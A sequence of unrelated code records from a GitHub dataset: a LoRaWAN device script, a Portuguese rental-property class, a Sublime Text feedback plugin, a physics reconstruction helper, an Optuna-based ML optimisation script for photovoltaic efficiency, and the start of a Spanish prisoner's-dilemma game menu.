7):\n lora.add_channel(i, frequency=915200000 + i * 200000, dr_min=0, dr_max=3)\n lora.add_channel(65, frequency=917500000, dr_min=4, dr_max=4)\n\n# create an OTA authentication params\napp_eui = binascii.unhexlify(APP_EUI.replace(' ',''))\napp_key = binascii.unhexlify(APP_KEY.replace(' ',''))\n\n# join a network using ABP (Activation By Personalization)\nlora.join(activation=LoRa.OTAA, auth=(app_eui, app_key), timeout=0)\n# wait until the module has joined the network\nwhile not lora.has_joined():\n time.sleep(2.5)\n print(\"attempt...\")\n\n\n# create a LoRa socket\ns = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n\n# set the LoRaWAN data rate\ns.setsockopt(socket.SOL_LORA, socket.SO_DR, 5)\n\ncount = 0\nwhile True:\n\n # make the socket blocking\n # (waits for the data to be sent and for the 2 receive windows to expire)\n s.setblocking(True)\n\n print(lora.frequency())\n # send some data\n\n count += 1\n send = str(count)\n print(count)\n\n s.send(send)\n\n # make the socket non-blocking\n # (because if there's no data received it will block forever...)\n s.setblocking(False)\n\n # get any data received (if any...)\n data = s.recv(64)\n print(data)\n\n # wait a random amount of time\n time.sleep(machine.rng() & 0x0F)\n","repo_name":"DimitriLeandro/SBrT2019","sub_path":"Scripts/Pycom/OTAAJeferson.py","file_name":"OTAAJeferson.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3707170478","text":"from Locador import Locador\nfrom Locatario import Locatario\nfrom Mobilia import Mobilia\n\nclass Imovel:\n def __init__(self, codigo: int, descricao: str, valor: float, locador: Locador):\n if isinstance(codigo, int) and isinstance(descricao, str) and isinstance(valor, float) and isinstance(locador, Locador):\n self.__codigo = codigo\n self.__descricao = descricao\n self.__valor = valor\n self.__locador = locador\n self.__locatarios = []\n self.__mobilias = []\n\n @property\n def codigo(self):\n return self.__codigo\n\n @codigo.setter\n def codigo(self, codigo: int):\n if isinstance(codigo, int):\n self.__codigo = codigo\n\n @property\n def descricao(self):\n return self.__descricao\n\n @descricao.setter\n def descricao(self, descricao: str):\n if isinstance(descricao, str):\n self.__descricao = descricao\n\n @property\n def locador(self):\n return self.__locador\n\n @locador.setter\n def locador(self, locador: Locador):\n if isinstance(locador, Locador):\n self.__locador = locador\n\n @property\n def locatarios(self):\n return self.__locatarios\n\n def incluir_locatario(self, locatario: Locatario):\n if isinstance(locatario, Locatario):\n if locatario not in self.__locatarios:\n self.__locatarios.append(locatario)\n\n def excluir_locatario(self, codigo_locatario: int):\n if isinstance(codigo_locatario, int):\n for locatario in self.__locatarios:\n if locatario.codigo == codigo_locatario:\n self.__locatarios.remove(locatario)\n\n @property\n def mobilias(self):\n return self.__mobilias\n\n def incluir_mobilia(self, codigo_mobilia: int, descricao_mobilia: str):\n '''if isinstance(codigo_mobilia, int) and isinstance(descricao_mobilia, str):\n cont = 0\n tam = len(self.__mobilias)\n soma = 0\n while cont < tam:\n if self.__mobilias[cont].codigo == codigo_mobilia:\n soma += 1\n cont += 1\n\n if soma == 0:\n nova_mobilia = Mobilia(codigo=codigo_mobilia, descricao=descricao_mobilia)\n self.__mobilias.append(nova_mobilia)'''\n\n if isinstance(codigo_mobilia, int) and isinstance(descricao_mobilia, str):\n valor = True\n for mobilia in self.__mobilias:\n if mobilia.codigo == codigo_mobilia:\n valor = False\n\n if valor:\n self.__mobilias.append(Mobilia(codigo=codigo_mobilia, descricao=descricao_mobilia))\n\n\n def excluir_mobilia(self, codigo_mobilia: int):\n if isinstance(codigo_mobilia, int):\n for mobilia in self.__mobilias:\n if mobilia.codigo == codigo_mobilia:\n self.__mobilias.remove(mobilia)\n\n def find_locatario_by_codigo(self, codigo_locatario: int):\n if isinstance(codigo_locatario, int):\n for locatario in self.__locatarios:\n if locatario.codigo == codigo_locatario:\n return locatario\n\ndef main():\n daniel = Locador(4954, 'Daniel', 67999, 'floripa')\n casa = Imovel(123, 'casa grande', 2450000.00, locador=daniel)\n casa.incluir_mobilia(123, 'cama')\n casa.incluir_mobilia(234, 'cadeira')\n casa.excluir_mobilia(444)\n francesco = Locatario(222, 'Francesco', 679898)\n otavio = Locatario(111, 'Otávio', 679922)\n fimose = Locatario(555, 'Vinicius', 489333)\n casa.incluir_locatario(francesco)\n casa.incluir_locatario(otavio)\n casa.excluir_locatario(333)\n casa.excluir_locatario(222)\n casa.incluir_locatario(fimose)\n print(casa.mobilias)\n print(casa.locatarios)\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"Daniel-Sottovia/INE5605","sub_path":"Exercicio4/Imovel.py","file_name":"Imovel.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25987937443","text":"import sublime, sublime_plugin\nimport re\nfrom itertools import chain\nfrom collections import Counter\n\ndef createFeedbackDictionary(source_lines, view, current_line_number):\n\n feedback_dictionary = {}\n current_header = \"\"\n prev_header = \"\"\n line_num = 0 # The num of the lines as we look through.\n\n for line in source_lines:\n\n line_text = view.substr(line)\n\n # See if this is a header - if so find out which\n header_match = re.match( r'^#+\\s*(.*)', line_text)\n\n if header_match:\n prev_header = header_match.group(1).strip()\n\n # If this is the current line - see what the previous header was \n line_num = view.rowcol(line.begin())[0] \n if line_num == current_line_number:\n current_header = prev_header\n\n # If this is a bullet point add it to the list for the header\n bullet_match = re.match( r'^\\s*-\\s+((?!@@)(?!e\\.g\\.).+)', line_text) # Ignore lines starting with @@\n if bullet_match and len(bullet_match.group(1).strip()) > 0:\n \n bullet_text = bullet_match.group(1).strip()\n\n if bullet_text.find('@@') > -1:\n bullet_text = bullet_text[:bullet_text.find('@@')]\n\n print(bullet_text.find('@@')) \n\n # Add it if it's not already there\n if prev_header not in feedback_dictionary:\n feedback_dictionary[prev_header] = []\n\n feedback_dictionary[prev_header].append(bullet_text)\n\n # If the current line of the cursor is below the last line, then we're within the last header\n if current_line_number >= line_num:\n current_header = prev_header\n\n return feedback_dictionary, current_header\n\nclass InsertfeedbackCommand(sublime_plugin.TextCommand):\n\n def run(self, edit, insert_text):\n self.view.insert(edit, self.view.sel()[0].begin(), insert_text)\n\nclass FeedwhackCommand(sublime_plugin.TextCommand):\n\n feedback_dictionary = {}\n current_feedback_list = set()\n all_feedback = [] \n\n def insert_line(self, index):\n\n if index == -1:\n return\n else:\n self.view.run_command('insertfeedback', {\"insert_text\": self.current_feedback_list[index] })\n\n def run(self, edit):\n\n source_lines = self.view.lines(sublime.Region(0, self.view.size()))\n current_line = self.view.rowcol(self.view.sel()[0].begin())[0]\n current_header = \"\"\n\n self.feedback_dictionary, current_header = createFeedbackDictionary(source_lines, self.view, current_line)\n \n if current_header in self.feedback_dictionary:\n # Open the quick panel to select the thing \n print(Counter(self.feedback_dictionary[current_header]).most_common())\n self.current_feedback_list = [fb for fb,count in Counter(self.feedback_dictionary[current_header]).most_common()]\n self.view.window().show_quick_panel(self.current_feedback_list, self.insert_line) \n else:\n sublime.error_message(\"You are not in a section I recognise\")\n\nclass FeedwhackallCommand(sublime_plugin.TextCommand):\n\n feedback_dictionary = {}\n current_feedback_list = set()\n all_feedback = [] \n\n def insert_line(self, index):\n\n if index == -1:\n return\n else:\n self.view.run_command('insertfeedback', {\"insert_text\": self.current_feedback_list[index] })\n\n def run(self, edit):\n\n source_lines = self.view.lines(sublime.Region(0, self.view.size()))\n current_line = self.view.rowcol(self.view.sel()[0].begin())[0]\n current_header = \"\"\n\n self.feedback_dictionary, current_header = createFeedbackDictionary(source_lines, self.view, current_line)\n\n if current_header in self.feedback_dictionary:\n # Open the quick panel to select the thing \n self.current_feedback_list = list(chain.from_iterable([ v for v in self.feedback_dictionary.values() ]))\n print(len(self.current_feedback_list))\n self.view.window().show_quick_panel(self.current_feedback_list, self.insert_line) \n else:\n sublime.error_message(\"You are not in a section\")\n\n","repo_name":"rcraggs/Feedwhack","sub_path":"feedwhack.py","file_name":"feedwhack.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6841101178","text":"#!/usr/bin/env python\n\n# Author : Y.Lemiere\n# Date : 2017/10\n# Contact : lemiere@lpccaen.in2p3.fr\n# Object : SuperNEMO Reconstruction manager\n\nfrom datetime import date, datetime\nimport time\nimport sys\nimport os\nimport subprocess\nimport ConfigParser\nimport uuid\n\n\nimport sn_simu_mgr\nimport sn_multi_launcher\n\n# # # ############# Fill DB using AMI client #########\n# # line='AddElement -project=\"supernemo\" -processingStep=\"production\" -entity=\"demo\"'\n# # line+=' -simu_id=\"'+prefix_simu_file+'_'+str(current_index)+'\"'\n# # line+=' -confidence_level=\"damned\"'\n# # line+=' -checking_status=\"unchecked\"'\n# # line+=' -event_generator=\"'+my_event+'\"'\n# # line+=' -experiment=\"'+experiment_name+'\"'\n# # line+=' -event_per_file=\"'+nb_event+'\"'\n# # line+=' -nb_of_file=\"'+nb_of_file+'\"'\n# # line+=' -output_path=\"'+CURRENT_OUTPUT_PATH+'\"'\n# # line+=' -user_comment=\"'+sn_user_comment+'\"'\n# # line+=' -vertex_generator=\"'+my_vertex+'\"'\n# # line+=' -user=\"'+USER+'\"'\n# # #line+=' -date=\"'+start_time+'\"'\n\n# # # ##########client = pyAMI.client.Client('supernemo')\n# # # ##########client.execute(line) \n\ndef prepare_files(arg0=None,arg1=None):\n\n debug = True\n function_name = \"prepare_files\"\n\n if debug:\n print (\"DEBUG : *************************************\")\n print (\"DEBUG : [%s] : Prepare files for reconstruction purpose using (%s, %s) \"%(function_name,arg0,arg1) )\n\n CURRENT_OUTPUT_PATH = arg0\n INPUT_FILE = arg1\n\n \n snemo_cfg = ConfigParser.ConfigParser()\n snemo_cfg.read('snemo.cfg')\n\n log_file_name=CURRENT_OUTPUT_PATH+snemo_cfg.get('PRODUCTION_CFG','sys_rel_path')+snemo_cfg.get('PRODUCTION_CFG','log_rel_path')+\"/\"+\"main.log\"\n log_file = open(log_file_name,\"a\")\n\n log_db_filename = CURRENT_OUTPUT_PATH+snemo_cfg.get('PRODUCTION_CFG','sys_rel_path')+snemo_cfg.get('PRODUCTION_CFG','log_rel_path')+\"/\"+snemo_cfg.get('DB_CFG','log_db')\n log_db = open(log_db_filename,'a')\n log_db.write('reconstruction_version=\"%s\"\\n'%(snemo_cfg.get('RECO_CFG','reconstruction_conf')))\n log_db.close()\n\n\n try:\n os.system(\"cp %s %s\"%(snemo_cfg.get('RECO_CFG','reconstruction_conf'),CURRENT_OUTPUT_PATH+snemo_cfg.get('PRODUCTION_CFG','config_rel_path')+snemo_cfg.get('PRODUCTION_CFG','conf_rel_path')+\"/.\")) \n except:\n print(\"\\033[91mERROR\\033[00m : [%s] : Can not copy reconstruction config file\"%function_name)\n log_file.write(\"\\033[91mERROR\\033[00m: [%s] : Can not copy reconstruction config file\"%function_name)\n sys.exit(1)\n \n try:\n sn_multi_launcher.prepare_reco_launcher(CURRENT_OUTPUT_PATH,INPUT_FILE)\n except:\n print(\"\\033[91mERROR\\033[00m : [%s] : Can not launch properly sn_multi_launcher.py\"%function_name)\n log_file.write(\"\\033[91mERROR\\033[00m: [%s] : Can not launch properly sn_multi_launcher.py\"%function_name)\n sys.exit(1)\n # #end f bunch\n \n if debug:\n print(\"DEBUG : [%s] : shell script production done !\"%function_name )\n print(\"DEBUG : *************************************\")\n \n\n\n\n \n \n","repo_name":"lemiere/sn-flash","sub_path":"sn_reco_mgr.py","file_name":"sn_reco_mgr.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9399355654","text":"import os, sys\nsys.path.append('../ml_for_opvs')\nfrom ML_models.sklearn.tokenizer import Tokenizer\n\nimport pickle\nimport ast\nimport time\nimport copy\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom argparse import ArgumentParser\n\nimport optuna\nfrom optuna.visualization import plot_contour, plot_param_importances\n\nfrom ngboost import NGBRegressor\nimport gpytorch\nimport torch\nfrom torch_geometric.loader import DataLoader\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.metrics import r2_score\nfrom sklearn.preprocessing import StandardScaler, QuantileTransformer, MinMaxScaler, FunctionTransformer\n\nfrom ml_for_opvs import utils\nfrom ml_for_opvs.models import GPRegressor, GNNEmbedder, GNNPredictor\nfrom ml_for_opvs.graphs import PairDataset, pair_collate, get_graphs\n\nALL_METRICS = ['rmse', 'r', 'r2', 'spearman', 'mse', 'mae']\n\n\ndef objective(trial, x_train, y_train, x_val, y_val, x_test, y_test, model, feature, out_dir='trained_results', detail=False):\n # wrapper to optimize hyperparameters\n\n # collectors for training information\n val_metric = []\n test_metrics = {n: [] for n in ALL_METRICS}\n results = {'y_pred': [], 'y_true': [], 'split': []}\n \n # optimize depending on model\n if model == 'ngboost':\n hp = {\n 'max_depth': trial.suggest_int('max_depth', 3, 7),\n 'min_samples_leaf': trial.suggest_int('min_samples_leaf', 1, 6),\n 'min_samples_split': trial.suggest_int('min_samples_split', 2, 6),\n 'n_estimators': trial.suggest_int('n_estimators', 1000, 2000, step=50)\n }\n\n # train return loss (minimize)\n m = NGBRegressor(\n Base = DecisionTreeRegressor(\n criterion='friedman_mse', \n max_depth=hp['max_depth'],\n min_samples_leaf=hp['min_samples_leaf'],\n min_samples_split=hp['min_samples_split']\n ), \n n_estimators=hp['n_estimators'],\n verbose=False,\n )\n m.fit(x_train, y_train.ravel(), x_val, y_val.ravel(), early_stopping_rounds=50)\n y_pred = m.predict(x_val)\n val_metric.append(mse(y_pred, y_val.ravel()))\n\n if detail:\n y_pred = m.predict(x_test)\n results['y_pred'].extend(y_pred.ravel().tolist())\n results['y_true'].extend(y_test.ravel().tolist())\n results['split'].extend([i]*len(y_test))\n for metric in test_metrics.keys():\n test_metrics[metric].append(utils.calculate_metric(metric, y_pred, y_test))\n\n\n # elif model == 'gp':\n # # use tanimoto if bit fingerprints\n # hp = {\n # # 'kernel': trial.suggest_categorical('kernel', ['tanimoto', 'rbf', 'matern']),\n # 'kernel': 'tanimoto' if feature == 'fp' else trial.suggest_categorical('kernel', ['rbf', 'matern']), \n # # 'lr': trial.suggest_float('lr', 1e-3, 1e-1, log=True)\n # 'lr': 0.05\n # }\n # n_epoch = 1000\n\n # # set priors\n # if hp['kernel'] == 'rbf':\n # hp.update({'lengthscale': trial.suggest_float('lengthscale', 0.05, 3.0)})\n # elif hp['kernel'] == 'cosine':\n # hp.update({'period_length': trial.suggest_float('period_length', 0.1, 3.0)})\n # elif hp['kernel'] == 'matern':\n # hp.update({\n # 'nu': trial.suggest_categorical('nu', [0.5, 1.5, 2.5]),\n # 'lengthscale': trial.suggest_float('lengthscale', 0.05, 3.0)\n # })\n # elif hp['kernel'] == 'rff':\n # hp.update({'num_samples': trial.suggest_int('num_samples', 10, 100, step=5)})\n\n # for i, tr_, va_, te_ in zip(range(len(train)), train, val, test):\n # # fit the scaler on training set only\n # x_train, y_train = x[tr_].astype(float), y[tr_].astype(float)\n # x_scaler = QuantileTransformer(n_quantiles=int(x_train.shape[0]/2.0)) if feature == 'mordred' else FunctionTransformer()\n # y_scaler = StandardScaler()\n\n # # transform the sets\n # x_train = torch.tensor(x_scaler.fit_transform(x_train))\n # y_train = torch.tensor(y_scaler.fit_transform(y_train))\n # x_val = torch.tensor(x_scaler.transform(x[va_].astype(float)))\n # y_val = torch.tensor(y_scaler.transform(y[va_].astype(float)))\n # x_test = torch.tensor(x_scaler.transform(x[te_].astype(float)))\n # y_test = torch.tensor(y_scaler.transform(y[te_].astype(float)))\n\n # # train return loss (minimize)\n # ll = gpytorch.likelihoods.GaussianLikelihood()\n # m = GPRegressor(x_train, y_train.ravel(), ll, **hp)\n # optimizer = torch.optim.Adam(m.parameters(), lr=hp['lr'])\n # mll = gpytorch.mlls.ExactMarginalLogLikelihood(ll, m)\n\n # m.train()\n # ll.train()\n # for _ in range(n_epoch):\n # optimizer.zero_grad()\n # y_pred = m(x_train)\n # loss = -mll(y_pred, y_train.ravel())\n # loss.backward()\n # optimizer.step()\n # # print(loss.item())\n\n # m.eval()\n # ll.eval()\n # with torch.no_grad():\n # y_pred = ll(m(x_val)).mean.numpy()\n # loss = mse(y_pred, y_val.numpy().ravel()) \n # # rscore = utils.r_score(y_pred.mean.numpy(), y_val.numpy().ravel())\n # val_metric.append(loss)\n\n # if detail:\n # y_test = y_test.numpy()\n # y_pred = y_scaler.inverse_transform(ll(m(x_test)).mean.numpy().reshape(y_test.shape))\n # y_test = y_scaler.inverse_transform(y_test)\n # results['y_pred'].extend(y_pred.ravel().tolist())\n # results['y_true'].extend(y_test.ravel().tolist())\n # results['split'].extend([i]*len(y_test))\n # for metric in test_metrics.keys():\n # test_metrics[metric].append(utils.calculate_metric(metric, y_pred, y_test))\n\n # elif model == 'gnn':\n # hp = {\n # 'latent_dim': trial.suggest_int('latent_dim', 10, 30),\n # 'embed_dim': trial.suggest_int('embed_dim', 10, 100), \n # # 'batch_size': 64,\n # # 'batch_size': trial.suggest_int('batch_size', 5, 7), # exponent of 2\n # # 'lr': trial.suggest_float('lr', 1e-4, 1e-2, log=True)\n # 'lr': 5e-3\n # }\n # batch_size = 100 # hp['batch_size']\n\n # # model settings\n # n_epoch = 1000\n # patience = 70\n # num_node_features = x[0][0].x.shape[-1]\n # num_edge_features = x[0][0].edge_attr.shape[-1]\n # output_dim = y.shape[-1]\n # # y = torch.tensor(y, dtype=torch.float)\n\n # for i, tr_, va_, te_ in zip(range(len(train)), train, val, test):\n # d_tr, a_tr = get_graphs(x, tr_)\n # d_va, a_va = get_graphs(x, va_)\n # d_te, a_te = get_graphs(x, te_)\n \n # # scale the targets\n # y_scaler = StandardScaler()\n\n # # transform the sets\n # y_train = torch.tensor(y_scaler.fit_transform(y[tr_].astype(float)), dtype=torch.float)\n # y_val = torch.tensor(y_scaler.transform(y[va_].astype(float)), dtype=torch.float)\n # y_test = torch.tensor(y_scaler.transform(y[te_].astype(float)), dtype=torch.float)\n\n # train_dl = DataLoader(PairDataset(d_tr, a_tr, y_train),\n # batch_size=batch_size, shuffle=True, collate_fn=pair_collate)\n # valid_dl = DataLoader(PairDataset(d_va, a_va, y_val),\n # batch_size=batch_size, shuffle=False, collate_fn=pair_collate)\n\n # # make the models\n # d_gnn = GNNEmbedder(num_node_features, num_edge_features, hp['latent_dim'], hp['embed_dim'])\n # a_gnn = GNNEmbedder(num_node_features, num_edge_features, hp['latent_dim'], hp['embed_dim'])\n # net = GNNPredictor(d_gnn, a_gnn, hp['embed_dim'], output_dim)\n\n # optimizer = torch.optim.Adam(net.parameters(), lr=hp['lr'])\n # criterion = torch.nn.MSELoss()\n\n # # early stopping criteria\n # best_loss = np.inf\n # best_model = None\n # best_epoch = 0\n # count = 0 \n # for epoch in range(n_epoch):\n # # s_time = time.time()\n # epoch_loss = 0\n # net.train()\n # for d_graph, a_graph, target in train_dl:\n # output = net(d_graph, a_graph)\n # loss = criterion(output, target)\n # loss.backward()\n # torch.nn.utils.clip_grad_norm_(net.parameters(), 1.0)\n # epoch_loss += loss.item()\n # optimizer.step()\n # train_avg_loss = epoch_loss / len(train_dl)\n\n # # validation\n # epoch_loss = 0\n # with torch.no_grad():\n # net.eval()\n # for d_graph, a_graph, target in valid_dl:\n # output = net(d_graph, a_graph)\n # loss = criterion(output, target)\n # epoch_loss += loss.item()\n # val_avg_loss = epoch_loss / len(valid_dl)\n\n # # check early stopping\n # if val_avg_loss < best_loss:\n # best_loss = val_avg_loss\n # best_model = copy.deepcopy(net)\n # best_epoch = epoch\n # count = 0\n # else:\n # count += 1\n \n # # print(f'Epoch {epoch:<4} Time elapsed: {time.time()-s_time}')\n\n # # trial.report(val_avg_loss, epoch)\n # # if trial.should_prune():\n # # raise optuna.exceptions.TrialPruned()\n # if count >= patience:\n # break\n\n # val_metric.append(best_loss)\n\n # if detail:\n # # also get the embeddings\n # with torch.no_grad():\n # # non shuffle the training set\n # train_dl = DataLoader(PairDataset(d_tr, a_tr, y_train),\n # batch_size=batch_size, shuffle=False, collate_fn=pair_collate)\n # test_dl = DataLoader(PairDataset(d_te, a_te, y_test),\n # batch_size=len(y_test), shuffle=False, collate_fn=pair_collate)\n\n # best_model.eval()\n # embeds = {key: {'acceptor': [], 'donor': [], 'target': []} for key in ['train', 'valid', 'test']}\n # for d_graph, a_graph, target in train_dl:\n # embeds['train']['acceptor'].append(best_model.embed_acceptor(a_graph).numpy())\n # embeds['train']['donor'].append(best_model.embed_donor(d_graph).numpy())\n # embeds['train']['target'].append(y_scaler.inverse_transform(target))\n # for d_graph, a_graph, target in valid_dl:\n # embeds['valid']['acceptor'].append(best_model.embed_acceptor(a_graph).numpy())\n # embeds['valid']['donor'].append(best_model.embed_donor(d_graph).numpy())\n # embeds['valid']['target'].append(y_scaler.inverse_transform(target))\n # for d_graph, a_graph, y_test in test_dl:\n # y_test = y_scaler.inverse_transform(y_test)\n # embeds['test']['acceptor'].append(best_model.embed_acceptor(a_graph).numpy())\n # embeds['test']['donor'].append(best_model.embed_donor(d_graph).numpy())\n # embeds['test']['target'].append(y_test)\n # y_pred = y_scaler.inverse_transform(best_model(d_graph, a_graph).numpy()) # not batched\n\n # # save test results\n # results['y_pred'].extend(y_pred.ravel().tolist())\n # results['y_true'].extend(y_test.ravel().tolist())\n # results['split'].extend([i]*len(y_test))\n \n # pickle.dump(embeds, open(f'{out_dir}/graphembed_split{i}.pkl', 'wb'))\n\n # for metric in test_metrics.keys():\n # test_metrics[metric].append(utils.calculate_metric(metric, y_pred, y_test))\n else:\n raise ValueError('Invalid model.')\n \n\n if not detail:\n return np.mean(val_metric)\n else:\n # pd.DataFrame(results).to_csv(f'{out_dir}/{feature}_{model}_predictions.csv', index=False)\n return pd.DataFrame(test_metrics)\n\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\"--model\", action=\"store\", type=str, help=\"Name of model.\")\n parser.add_argument(\"--n_trials\", action=\"store\", type=int, default=1, help=\"Number of optimization trials.\")\n parser.add_argument(\"--feature\", action=\"store\", type=str, default='fp', help=\"Name of feature.\")\n parser.add_argument(\"--dataset\", action=\"store\", type=str, default=\"min\", help=\"Dataset of choice.\")\n parser.add_argument(\"--num_workers\", action=\"store\", type=int, default=1, help=\"Number of workers, defaults to 1.\")\n\n FLAGS = parser.parse_args()\n \n # print(f'Running for {FLAGS.feature}, on {FLAGS.model}, on {FLAGS.dataset}')\n\n # read in the data\n df = pd.read_csv(f'data/{FLAGS.dataset}.csv')\n\n os.makedirs(f'trained_results/' , exist_ok=True)\n\n # if FLAGS.feature == 'mordred':\n # x_donor = utils.pca_features(x_donor)\n # x_acceptor = utils.pca_features(x_acceptor)\n\n if FLAGS.feature in ['mordred', 'fp', 'pca_mordred']:\n # remove zero variance and concatentate if vector features\n with open(f'data/{FLAGS.dataset}_{FLAGS.feature}.pkl', 'rb') as f:\n data = pickle.load(f)\n x_donor = data['donor']\n x_acceptor = data['acceptor']\n x = np.concatenate((x_donor, x_acceptor), axis=-1)\n \n elif FLAGS.feature == 'selfies':\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/smiles/master_smiles.csv')\n tk = Tokenizer()\n token2idx, max_len = tk.tokenize_selfies(f_df['DA_SELFIES'])\n x = f_df['DA_SELFIES'].apply(lambda r: tk.tokenize_from_dict(token2idx, r)).tolist()\n x = np.array(tk.pad_input(x, max_len))\n \n elif FLAGS.feature == 'smiles':\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/smiles/master_smiles.csv')\n x, max_length, vocab_length, token2idx = Tokenizer().tokenize_data(f_df['DA_SMILES'])\n x = np.array(x)\n \n elif FLAGS.feature == 'bigsmiles':\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/smiles/master_smiles.csv')\n x, max_length, vocab_length, token2idx = Tokenizer().tokenize_data(f_df['DA_BigSMILES'])\n x = np.array(x)\n \n elif FLAGS.feature == 'brics': # label encoding of brics fragments\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/BRICS/master_brics_frag.csv')\n x = np.array(f_df['DA_tokenized_BRICS'].apply(ast.literal_eval).tolist())\n \n elif FLAGS.feature == 'homolumo':\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/smiles/master_smiles.csv')\n x = f_df[['HOMO_D_eV', 'LUMO_D_eV', 'HOMO_A_eV', 'LUMO_A_eV']].to_numpy()\n \n elif FLAGS.feature in ['graph', 'simple_graph']:\n with open(f'data/{FLAGS.dataset}_{FLAGS.feature}.pkl', 'rb') as f:\n data = pickle.load(f)\n x = [data['donor'], data['acceptor']]\n \n else:\n raise ValueError('No such feature')\n \n # get the targets\n y = df[['calc_PCE_percent']].to_numpy()\n \n if FLAGS.feature not in ['graph', 'simple_graph']:\n valid_idx = ~np.isnan(x).any(axis=1)\n x = x[valid_idx]\n y = y[valid_idx]\n\n utils.set_seed()\n if FLAGS.feature == 'graph':\n train, val, test = utils.get_cv_splits(x[0])\n else:\n train, val, test = utils.get_cv_splits(x) # 64%/16%/20% # just the indices\n \n metrics_df = []\n for i, tr_, va_, te_ in zip(range(len(train)), train, val, test):\n x_train, y_train = x[tr_], y[tr_]\n x_val, y_val = x[va_], y[va_]\n x_test, y_test = x[te_], y[te_]\n\n # perform optimization\n study = optuna.create_study(direction='minimize', study_name=f'{FLAGS.dataset}_{FLAGS.model}_{FLAGS.feature}')\n study.optimize(lambda trial: objective(trial, x_train, y_train, x_val, y_val, x_test, y_test, FLAGS.model, FLAGS.feature), \n n_trials=FLAGS.n_trials, n_jobs=FLAGS.num_workers)\n\n # print the best studies\n print(\"Number of finished trials: \", len(study.trials))\n print(\"Best trial:\")\n trial = study.best_trial\n\n print(\" Value: {}\".format(trial.value))\n print(\" Params: \")\n for key, value in trial.params.items():\n print(\" {}: {}\".format(key, value))\n\n # visualize optimization with optuna\n # os.makedirs(f'models/{study.study_name}' , exist_ok=True)\n # fig = plot_contour(study)\n # fig.write_image(f'models/{study.study_name}/opt.png')\n # try:\n # fig = plot_param_importances(study)\n # fig.write_image(f'models/{study.study_name}/opt_hp_importance.png')\n # except:\n # print('Hparam importance plot failed.')\n # pickle.dump(trial.params, open(f'models/{study.study_name}/best_params.pkl', 'wb'))\n\n # get the test metrics\n df = objective(trial, x_train, y_train, x_val, y_val, x_test, y_test, FLAGS.model, FLAGS.feature, detail=True)\n metrics_df.append(df)\n \n metrics_df = pd.concat(metrics_df)\n metrics_df.to_csv(f'trained_results/{study.study_name}.csv', index=False)\n \n vmap = {\n 'min': 'OPV_Min',\n 'fp': 'DA_FP_radius_3_nbits_512',\n 'brics': 'DA_tokenized_BRICS',\n 'selfies': 'DA_SELFIES',\n 'smiles': 'DA_SMILES',\n 'bigsmiles': 'DA_BigSMILES',\n 'graph': 'DA_gnn',\n 'homolumo': 'HOMO_D_eV,LUMO_D_eV,HOMO_A_eV,LUMO_A_eV',\n 'mordred': 'mordred',\n 'pca_mordred': 'pca_mordred'\n }\n \n summary_df = pd.DataFrame(\n {\n 'Dataset': vmap[FLAGS.dataset],\n 'num_of_folds': 5,\n 'Features': vmap[FLAGS.feature],\n 'Targets Model': 'calc_PCE_percent',\n 'r_mean': metrics_df['r'].mean(),\n 'r_std': metrics_df['r'].std(),\n 'r2_mean': metrics_df['r2'].mean(),\n 'r2_std': metrics_df['r2'].std(),\n 'rmse_mean': metrics_df['rmse'].mean(),\n 'rmse_std': metrics_df['rmse'].std(),\n 'mae_mean': metrics_df['mae'].mean(),\n 'mae_std': metrics_df['mae'].std(),\n 'num_of_data': len(metrics_df)\n }, index=[0]\n )\n \n summary_df.to_csv(f'trained_results/{study.study_name}_summary.csv', index=False)\n\n # print()\n\n","repo_name":"stanlo229/ml_for_opvs","sub_path":"gary/optimize.py","file_name":"optimize.py","file_ext":"py","file_size_in_byte":19228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"13857296283","text":"# Translation of the Code created by Sanjin Dedic creator of Robotix.com.au\n# Class Game theory - Ph.D in Economics UAM\n# Confesar o Mentir\n\nimport AIsimulation, AhumanGame, SiempreConfesar, SiempreMentir, titForTat, AleatorioBasic, ConfesarAleatorio, MentirAleatorio, \\\n Resentido, pavlov, ES, myStrategy\n\nchoices = {'1-SiempreConfesar', '2-SiempreMentir', '3-titForTat', '4-AleatorioBasic', '5-ConfesarAleatorio',\n '6-MentirAleatorio', '7-Resentido', '8-pavlov', '9-ES', '10-myStrategy'}\n\nstrategies = {1: SiempreConfesar, 2: SiempreMentir, 3: titForTat, 4: AleatorioBasic, 5: ConfesarAleatorio, 6: MentirAleatorio,\n 7: Resentido, 8: pavlov, 9: ES, 10: myStrategy}\n\nprint('Estas son las opciones del juego')\nprint('presiona 1 para probar una estrategia contra todas las demas estrategias ')\nprint('presiona 2 para jugar con una estrategia de tu elección ')\nchoice = int(input())\n\nif choice == 1:\n print('Lista de estrategias ')\n print(choices)\n num = int(input('Escoge la estrategia por su numero '))\n strategy = strategies[num]\n AIsimulation.testStrategy(strategy, 20)\n\nif choice == 2:\n print('Contra quien quieres jugar? ')\n print(choices)\n num = int(input('Escoga la estrategia por su numero '))\n strategy = strategies[num]\n rounds = int(input('Cuantos rounds quieres jugar?: '))\n AhumanGame.play(strategy, 